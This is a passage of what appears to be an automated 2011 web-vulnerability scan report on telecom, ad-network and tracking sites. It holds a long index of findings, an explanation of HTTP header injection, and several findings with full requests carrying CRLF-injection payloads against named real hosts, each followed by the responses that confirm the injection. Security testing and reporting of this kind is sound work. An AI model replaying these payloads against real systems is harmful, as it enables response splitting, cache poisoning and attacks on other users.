19.14. http://frontier.com/AgentOrdering/customAppTabInfo/tabSetup.js

19.15. http://frontier.com/AgentOrdering/javascripts/AgentOrdering.js

19.16. http://frontier.com/AgentOrdering/javascripts/validateinteger.js

19.17. http://frontier.com/Controls/VirtualCode.ashx

19.18. http://frontier.com/Controls/VirtualCode.ashx

19.19. http://frontier.com/Js/formHelpers.js

19.20. http://frontier.com/Js/jQuery/jquery-1.4.4.min.js

19.21. http://frontier.com/Js/jQuery/jquery.maskedinput.js

19.22. http://frontier.com/Js/s_code.js

19.23. http://frontier.com/Resources/3rdParty/HBX/hbx.js

19.24. http://frontier.com/Resources/3rdParty/JQuery/jq.client.plugin.js

19.25. http://frontier.com/Resources/3rdParty/JQuery/jquery-1.4.2.min.js

19.26. http://frontier.com/Resources/3rdParty/JQuery/jquery-jtemplates.js

19.27. http://frontier.com/Resources/3rdParty/JQuery/jquery-ui.min.js

19.28. http://frontier.com/Resources/3rdParty/JQuery/jquery.json-2.2.js

19.29. http://frontier.com/images/FTRMain/frontier_Logo.jpg

19.30. http://frontier.com/images/FTRMain/gradientBox.png

19.31. http://frontier.com/images/FTRMain/small_arrow.png

19.32. http://frontier.com/images/icon_print.gif

19.33. http://frontier.com/js/jquery/jquery.numeric.js

19.34. http://static.ak.fbcdn.net/connect.php/js/FB.Share

19.35. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.36. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.37. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.38. http://www.facebook.com/extern/login_status.php

19.39. http://www.facebook.com/extern/login_status.php

19.40. http://www.facebook.com/extern/login_status.php

19.41. http://www.facebook.com/extern/login_status.php

19.42. http://www.facebook.com/extern/login_status.php

19.43. http://www.facebook.com/extern/login_status.php

19.44. http://www.facebook.com/extern/login_status.php

19.45. http://www.facebook.com/extern/login_status.php

19.46. http://www.facebook.com/extern/login_status.php

19.47. http://www.facebook.com/extern/login_status.php

19.48. http://www.facebook.com/extern/login_status.php

19.49. http://www.facebook.com/extern/login_status.php

19.50. http://www.facebook.com/extern/login_status.php

19.51. http://www.facebook.com/extern/login_status.php

19.52. http://www.facebook.com/plugins/activity.php

19.53. http://www.facebook.com/plugins/like.php

19.54. http://www.facebook.com/plugins/like.php

19.55. http://www.facebook.com/plugins/like.php

19.56. http://www.facebook.com/plugins/like.php

19.57. http://www.facebook.com/plugins/like.php

19.58. http://www.facebook.com/plugins/like.php

19.59. http://www.facebook.com/plugins/like.php

19.60. http://www.facebook.com/plugins/like.php

19.61. http://www.facebook.com/plugins/like.php

19.62. http://www.facebook.com/plugins/like.php

19.63. http://www.facebook.com/plugins/like.php

19.64. http://www.facebook.com/plugins/like.php

19.65. http://www.facebook.com/plugins/like.php

19.66. http://www.facebook.com/plugins/like.php

19.67. http://www.facebook.com/plugins/like.php

19.68. http://www.facebook.com/plugins/likebox.php

19.69. http://www.facebook.com/plugins/likebox.php

19.70. http://www.facebook.com/plugins/likebox.php

19.71. http://www.fairpoint.com/scripts/script.js

19.72. http://www.frontier.com/Js/s_code.js

19.73. http://www.frontierhelp.com/

19.74. http://www.frontierpages.com/scripts/s_code.js

19.75. http://www.vonage.com/

19.76. http://www.vonage.com/

19.77. http://www.vonage.com/googlesearch/cluster.js

19.78. http://www.vonage.com/search.php

19.79. http://www.whitefence.com/static/Seymour.js

20. Social security numbers disclosed

21. Credit card numbers disclosed

21.1. http://ad.doubleclick.net/adj/myfitv.com/z300x250

21.2. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

21.3. http://search.yahoo.com/search

22. Robots.txt file

22.1. http://533-rgz-601.mktoresp.com/webevents/visitWebPage

22.2. http://a.adready.com/campaign_event/impression

22.3. http://a.analytics.yahoo.com/fpc.pl

22.4. http://ad.turn.com/server/ads.htm

22.5. http://ad.yieldmanager.com/pixel

22.6. http://ads.bluelithium.com/iframe3

22.7. http://ads.pointroll.com/PortalServe/

22.8. http://adserver.teracent.net/tase/ad

22.9. http://altfarm.mediaplex.com/ad/js/3484-103250-2056-0

22.10. http://api.facebook.com/restserver.php

22.11. http://api.recaptcha.net/challenge

22.12. http://as.casalemedia.com/j

22.13. http://as1.suitesmart.com/99917/G15493.js

22.14. http://autos.yahoo.com/

22.15. http://b.scorecardresearch.com/b

22.16. http://by.optimost.com/trial/471/p/customerhomepage.58a/57/content.js

22.17. http://cdn.optmd.com/V2/80181/197812/index.html

22.18. http://cdn.turn.com/server/ddc.htm

22.19. http://citizenstelecom.112.2o7.net/b/ss/cznfrontier/1/H.22.1/s93230034164153

22.20. http://comcast-www.baynote.net/baynote/tags3/common

22.21. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard

22.22. http://ec.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.swf

22.23. http://ehg-verizon.hitbox.com/HG

22.24. http://espanol.vonage.com/mpel.js

22.25. http://event.rtrk.com/event/

22.26. http://finance.yahoo.com/

22.27. http://fonts.googleapis.com/css

22.28. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

22.29. http://frontier.com/winwin1

22.30. http://g-pixel.invitemedia.com/gmatcher

22.31. http://games.frontier.com/

22.32. http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

22.33. https://go.ooma.com/activate

22.34. http://gws.maps.yahoo.com/MapImage

22.35. http://iar.worthathousandwords.com/iar.gif

22.36. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

22.37. http://int.teracent.net/tase/int

22.38. http://integrate.112.2o7.net/dfa_echo

22.39. http://ips-invite.iperceptions.com/webValidator.aspx

22.40. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

22.41. https://login.aptela.com/cgi/login.cgi

22.42. https://login.comcast.net/login

22.43. http://metrics.scottrade.com/b/ss/scottradecom,scottradeglobal/1/H.22.1/s98473441649693

22.44. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s95377543827053

22.45. http://movies.yahoo.com/

22.46. http://music.yahoo.com/

22.47. http://new.music.yahoo.com/

22.48. http://o.analytics.yahoo.com/fpc.pl

22.49. http://pagead2.googlesyndication.com/pagead/imgad

22.50. http://pixel.everesttech.net/2565/i

22.51. http://pixel.fetchback.com/serve/fb/pdc

22.52. http://pixel.invitemedia.com/data_sync

22.53. http://pixel.quantserve.com/api/segments.json

22.54. http://postcalc.usps.gov/WebResource.axd

22.55. http://r.casalemedia.com/r

22.56. http://realestate.yahoo.com/

22.57. http://s0.2mdn.net/1033846/mmna_i_likeable_300x250.swf

22.58. http://search.keywordblocks.com/

22.59. http://search.yahoo.com/search

22.60. http://segment-pixel.invitemedia.com/pixel

22.61. http://sensor2.suitesmart.com/sensor4.js

22.62. http://serviceo.comcast.net/b/ss/comcastdotcomprod/1/H.22.1/s91887737833894

22.63. http://servicetips.whitefence.com/

22.64. http://shopping.yahoo.com/

22.65. http://show.partners-z.com/s/show

22.66. http://sitesearch.comcast.com/static.php

22.67. http://spe.atdmt.com/ds/UXULASONYSPE/Bucky_Larson_Born_to_be_a_Star/300x250_BTBS_Dante_Yh1k.swf

22.68. http://speed.pointroll.com/PointRoll/Media/Banners/Apple/891280/dg2_300x250.jpg

22.69. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.70. http://support.aptela.com:9000/tools/ResetPassword.cgi

22.71. http://t.invitemedia.com/track_imp

22.72. http://t.pointroll.com/PointRoll/Track/

22.73. http://tags.mathtag.com/view/js/

22.74. http://themes.googleusercontent.com/static/fonts/ubuntu/v1/_xyN3apAT_yRRDeqB3sPRg.woff

22.75. http://udmserve.net/udm/img.fetch

22.76. http://us.bc.yahoo.com/b

22.77. http://utdi.reachlocal.com/

22.78. http://utdi.reachlocal.net/index.html

22.79. http://video.music.yahoo.com/crossdomain.xml

22.80. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s91730218948796

22.81. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

22.82. http://www.aptela.com/lp2011/T2V1

22.83. http://www.burstnet.com/enlightn/8117/3E06/

22.84. http://www.comcast.com/shop/buyflow/default.ashx

22.85. https://www.comcast.com/Localization/Localize.cspx

22.86. http://www.facebook.com/plugins/like.php

22.87. http://www.frontier.com/yahoo/fy_excl2.aspx

22.88. https://www.frontier.com/AgentOrdering/Login/

22.89. http://www.google-analytics.com/siteopt.js

22.90. http://www.googleadservices.com/pagead/aclk

22.91. http://www.myfitv.com/portal/recent_tv_elastic

22.92. http://www.ooma.com/

22.93. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

22.94. http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html

22.95. https://www.usps.com/tools/domesticratecalc/welcome.htm

22.96. http://www.vonage.com/

22.97. http://www.whitefence.com/category/home-phone/

22.98. http://www.zillow.com/app

22.99. http://www2.whitefence.com/a

22.100. http://xfinity.comcast.net/js-api/compressed/xpbar.js

23. Cacheable HTTPS response

23.1. https://login.comcast.net/myaccount/images/overlay-bg.png

23.2. https://login.comcast.net/myaccount/images/sprites/base.png

23.3. https://login.comcast.net/myaccount/images/sprites/gradient.png

23.4. https://login.comcast.net/myaccount/images/sprites/xfinity_sprite.png

23.5. https://login.comcast.net/myaccount/js/additional-methods.min.js

23.6. https://login.comcast.net/myaccount/js/jquery-1.5.2.min.js

23.7. https://login.comcast.net/myaccount/js/jquery.validate.min.js

23.8. https://login.comcast.net/myaccount/js/omniture.js

23.9. https://login.comcast.net/myaccount/js/scripts.min.js

23.10. https://login.frontier.com/webmail/

23.11. https://us.etrade.com/e/t/jumppage/viewjumppage

23.12. https://www.comcast.com/Localization/QueryCompletion.cajax

23.13. https://www.comcastsupport.com/ChatEntry/

23.14. https://www.comcastsupport.com/ChatEntry/Content/Images/favicon.ico

23.15. https://www.comcastsupport.com/ChatEntry/Content/Images/mainbg.jpg

23.16. https://www.comcastsupport.com/ChatEntry/Content/Images/start_chat.png

23.17. https://www.comcastsupport.com/ChatEntry/Content/images/menubg.jpg

23.18. https://www.comcastsupport.com/ChatEntry/Forms/Suggestions.aspx

23.19. https://www.comcastsupport.com/ChatEntry/Forms/UserForm.aspx

23.20. https://www.comcastsupport.com/ChatEntry/eHelpProxy.asmx

23.21. https://www.comcastsupport.com/ChatEntry/img/xfinity/gradient.png

23.22. https://www.comcastsupport.com/chatentry/Default.aspx

23.23. https://www.fidelity.com/welcome/200-free-trades

23.24. https://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

23.25. https://www.frontier.com/AgentOrdering/Login/

23.26. https://www.frontier.com/AgentOrdering/Login/Default.aspx

23.27. https://www.frontier.com/BillPay/Login.aspx

23.28. https://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

23.29. https://www.frontier.com/Shop/Login.aspx

23.30. https://www.frontiermobile.com/data/

23.31. https://www.frontiermobile.com/favicon.ico

23.32. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

24. HTML does not specify charset

24.1. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2

24.2. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11

24.3. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12

24.4. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396

24.5. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400

24.6. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2

24.7. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.101

24.8. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.102

24.9. http://ad.doubleclick.net/adi/ober.frontier/$%7BSEG_IDS%7D

24.10. http://ad.doubleclick.net/adi/ober.frontier/product_119282623

24.11. http://ad.doubleclick.net/adi/ober.frontier/product_undefined

24.12. http://ad.yieldmanager.com/iframe3

24.13. http://ads.pointroll.com/PortalServe/

24.14. http://comcast-www.baynote.net/favicon.ico

24.15. http://games.frontier.com/graphics/frontier/1000/site/favicon.ico

24.16. https://login.frontier.com/webmail/

24.17. https://login.frontiermobile.com/

24.18. http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html

24.19. http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

24.20. http://pixel.invitemedia.com/data_sync

24.21. http://sensor2.suitesmart.com/sensor4.js

24.22. http://uac.advertising.com/wrapper/aceUACping.htm

24.23. https://us.etrade.com/e/t/jumppage/viewjumppage

24.24. http://view.atdmt.com/MDS/iview/346808775/direct/01

24.25. http://view.atdmt.com/TR1/iview/332867993/direct/01

24.26. http://view.atdmt.com/ULA/iview/351127232/direct/01

24.27. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

24.28. http://www.comcast.com/2go/

24.29. http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html

24.30. https://www.usps.com/tools/domesticratecalc/welcome.htm

24.31. http://www.vonage.com/googlesearch/get_results.php

24.32. http://www.websitealive9.com/2140/Visitor/vTracker_v2.asp

25. Content type incorrectly stated

25.1. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

25.2. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

25.3. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

25.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

25.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

25.6. http://ads.yimg.com/a/a/ma/matt/yahoo_realestate_home180x40.jpeg

25.7. http://amch.questionmarket.com/adsc/d847178/33/873120/randm.js

25.8. http://beacon.dedicatednetworks.com/js/t.aspx

25.9. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

25.10. http://cimage.adobe.com/omninav/thin_omninav2.0.4.js

25.11. http://comcast-www.baynote.net/baynote/tags3/common

25.12. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard

25.13. http://customer.comcast.com/App_Themes/Default/img/SubChannelSelected.gif

25.14. http://event.adxpose.com/event.flow

25.15. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

25.16. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

25.17. http://frontier.my.yahoo.com/e/js

25.18. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx

25.19. http://games.frontier.com/graphics/frontier/1000/site/favicon.ico

25.20. http://ips-invite.iperceptions.com/webValidator.aspx

25.21. https://login.comcast.net/myaccount/images/overlay-bg.png

25.22. https://login.comcast.net/myaccount/images/sprites/base.png

25.23. https://login.comcast.net/myaccount/images/sprites/gradient.png

25.24. https://login.comcast.net/myaccount/images/sprites/xfinity_sprite.png

25.25. https://login.comcast.net/myaccount/js/additional-methods.min.js

25.26. https://login.comcast.net/myaccount/js/jquery-1.5.2.min.js

25.27. https://login.comcast.net/myaccount/js/jquery.validate.min.js

25.28. https://login.comcast.net/myaccount/js/omniture.js

25.29. https://login.comcast.net/myaccount/js/scripts.min.js

25.30. http://maps.yahoo.com/services/bizloc/america/bizloc

25.31. http://new.music.yahoo.com/chartsHpJS.js

25.32. http://new.music.yahoo.com/rhap_status.html

25.33. http://new.music.yahoo.com/ymusicStayConnected/

25.34. http://pixel.fetchback.com/serve/fb/pdc

25.35. http://realestate.yahoo.com/autocomplete/cities.html

25.36. http://realestate.yahoo.com/robots.txt

25.37. http://sales.liveperson.net/hcp/html/mTag.js

25.38. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**

25.39. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**

25.40. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/59689.70851972699

25.41. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/78868.26389003545

25.42. http://sensor2.suitesmart.com/sensor4.js

25.43. http://sitesearch.comcast.com/

25.44. http://sitesearch.comcast.com/favicon.ico

25.45. http://verify.authorize.net/anetseal/images/secure90x72.gif

25.46. http://www.aptela.com/favicon.ico

25.47. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_Middle.gif

25.48. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_bottom.gif

25.49. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_top.gif

25.50. https://www.comcast.com/Localization/QueryCompletion.cajax

25.51. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

25.52. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

25.53. https://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

25.54. https://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

25.55. http://www.ooma.com/poormanscron/run-cron-check

25.56. http://www.ooma.com/sites/all/themes/ooma/img/home_savings_bar.png

25.57. http://www.vonage.com/googlesearch/get_results.php

25.58. http://www.websitealive9.com/2140/Visitor/vTracker_v2.asp

25.59. http://www.whitefence.com/favicon.ico

26. Content type is not specified

26.1. http://ad.yieldmanager.com/st

26.2. http://ads.pointroll.com/PortalServe/



1. HTTP header injection  next
There are 47 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://40.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 90175%0d%0a2b5c414d0be was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=85&camp=2140&affcode=kw94444&cid=13569521491&networkType=search&url[]=http%3A%2F%2Fwww.whitefence.com%2Fcategory%2Fhome-phone%2F&90175%0d%0a2b5c414d0be=1 HTTP/1.1
Host: 40.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d56463713%00%0D%0A1812607ce81; expires=Mon, 05-Dec-2011 11:51:59 GMT; path=/; domain=.xg4ken.com
Location: http://www.whitefence.com/category/home-phone/?90175
2b5c414d0be
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.2. http://40.xg4ken.com/media/redir.php [url[] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload fda0b%0d%0ab73d971c7c4 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=85&camp=2140&affcode=kw94444&cid=13569521491&networkType=search&url[]=http%3A%2F%2Fwww.whitefence.com%2Fcategory%2Fhome-phone%2Ffda0b%0d%0ab73d971c7c4 HTTP/1.1
Host: 40.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:51:57 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564e4a5efed390e8f23a4fed9e9; expires=Mon, 05-Dec-2011 11:51:57 GMT; path=/; domain=.xg4ken.com
Location: http://www.whitefence.com/category/home-phone/fda0b
b73d971c7c4

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.3. http://pixel.everesttech.net/2565/c [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /2565/c

Issue detail

The value of the url request parameter is copied into the Location response header. The payload 6b47c%0d%0a72c5727bcc8 was submitted in the url parameter. This caused a response containing an injected HTTP header.

Request

GET /2565/c?ev_ct=d&ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811&url=http%3A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%3Futm_source%3Dyhofin%26utm_medium%3Dpaid-banner-ads%26utm_campaign%3D120x60-QuotesBttn%26utm_content%3Dstock%3AoldGrnBlk6b47c%0d%0a72c5727bcc8 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_session_v2=AXNOZhaIGXMAAIM3; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:34 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3160904156a23c7e8c69dff72; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR16090415e6ca9e4734959b1; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:34 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk6b47c
72c5727bcc8

Content-Length: 382
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://landing.optionshouse.com/rate/395/yhofin
...[SNIP]...

1.4. http://redirect.rtrk.com/redirect [RL_ckstr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The value of the RL_ckstr request parameter is copied into the Set-Cookie response header. The payload 116f0%0d%0afc7a19355f0 was submitted in the RL_ckstr parameter. This caused a response containing an injected HTTP header.

Request

GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0116f0%0d%0afc7a19355f0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:48 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0116f0
fc7a19355f0
; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 587
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:41 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?scid=2323693
...[SNIP]...

1.5. http://redirect.rtrk.com/redirect [RL_qstr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The value of the RL_qstr request parameter is copied into the Location response header. The payload d0f4f%0d%0a6e008c98e33 was submitted in the RL_qstr parameter. This caused a response containing an injected HTTP header.

Request

